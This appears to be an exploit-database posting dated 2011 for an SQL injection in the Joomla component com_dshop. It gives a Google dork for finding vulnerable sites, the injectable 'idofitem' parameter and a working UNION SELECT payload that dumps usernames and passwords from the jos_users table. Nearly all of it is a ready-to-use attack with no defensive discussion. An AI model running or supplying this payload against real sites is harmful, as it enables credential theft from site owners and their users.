Joomla! Component com_dshop - SQL Injection



EKU-ID: 24062 CVE: OSVDB-83195 OSVDB-ID:
Author: CoBRa_21 Published: 2011-12-19 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


################################################################################################
#  Exploit Title: Joomla Component (com_dshop) SQL Injection Vulnerability
#
#  Author : CoBRa_21
#
#  E-Mail : uyku_cu [at] windowslive.com
#
#  Google Dork : inurl:com_dshop
#
#  Status : High-Risk
#
#  Script Page : null
#
#  Reference : https://www.securityfocus.com/bid/47971/info
################################################################################################
#
#  SQL Vulnerability
#
#  http://127.0.0.1/[PATH]/index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 (SQL)
#
#  SQL Exploit
#
#  +union+select+0,1,2,group_concat(username,0x3a,password),4,5,6,7+from+jos_users
#
################################################################################################
#                                                                                                   ( Vulnerability Researcher )
################################################################################################